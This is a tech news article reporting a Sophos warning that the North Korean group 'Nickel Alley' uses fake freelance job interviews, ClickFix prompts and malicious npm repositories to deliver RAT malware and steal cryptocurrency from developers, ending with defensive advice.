North Korean hackers are duping freelance developers with fake interviews to steal cryptocurrency and deliver malware — Sophos warns the 'Nickel Alley' group is using LinkedIn, Upwork, and Fiverr to target victims

North Korean hackers are targeting software developers in a new malware campaign that uses a fake interview process to steal cryptocurrency.

The campaign targets developers, especially those in the finance and technology industries, with profiles on freelance websites such as Upwork or Fiverr. It offers well-paid job opportunities and targets specific, high-value individuals.

It uses typosquatting or compromised legitimate npm repositories that victims are persuaded to inadvertently download and execute.

Researchers at the Sophos Counter Threat Unit have attributed the campaign to Nickel Alley, a threat group operating on behalf of the North Korean government.

"The group notoriously targets professionals in the technology sector by advertising fake job opportunities, deceiving prospective candidates through a fake job interview process, and ultimately delivering malware," the company said in an advisory.

As part of its attacks, Nickel Alley often creates a fake LinkedIn company page to build credibility, with a coordinating GitHub account for malware delivery.

The website homepage is generic and advertises 'tech talent' and managed service solutions. However, different domains are included on the LinkedIn company page and the GitHub account – which researchers noted shows inconsistency and lack of attention to detail.

Nickel Alley ramping up operations

The advisory from Sophos comes after a June 2025 X post warned of a campaign involving targeted emails promoting job opportunities at the fake Astra Byte Sync company.

The threat actors hadn't actually built the website at the time the emails were sent, meaning that the site simply displayed the hosting provider’s default page.

Over the last year, the group has used the popular ClickFix tactic to deliver PyLangGhost RAT malware via fake job skills assessment tasks.

This involved the attacker-controlled web interface presenting an error informing the victim that they must run a command locally to fix the issue – a command that instead initiated a series of actions leading to PyLangGhost RAT.

It previously used a GoLang-based version known as GoLangGhost RAT.

Meanwhile, in October, Sophos analysts uncovered a targeted attack where the threat actors convinced a victim to download, or clone, the content of a GitHub repository and execute the code locally using the 'npm install' and 'npm start' commands.

The GitHub account masquerades as a software development company specializing in full stack web development and blockchain solutions, and contains links to an 'official' company website and a fake LinkedIn company page.

While the main aim of these attacks appears to be cryptocurrency theft, Sophos said the threat group has also made it clear that it plans to use initial access for further supply chain compromise or corporate espionage.

"Additionally, the threat group has strategically selected follow-on payloads based on profiling victims’ system. Software developers, especially those in the finance and technology industries, are at elevated risk due to Nickel Alley’s targeting profile," Sophos warned.

"Organizations should monitor command execution and network traffic that spawns from Node.js processes, as it may indicate malware retrieval. As a general security practice, organizations should encourage employees to report suspicious unsolicited social media or email-based recruitment contact."

FOLLOW US ON SOCIAL MEDIA

Follow ITPro on Google News and add us as a preferred source to keep tabs on all our latest news, analysis, views, and reviews.

You can also follow ITPro on LinkedIn, X, Facebook, and BlueSky.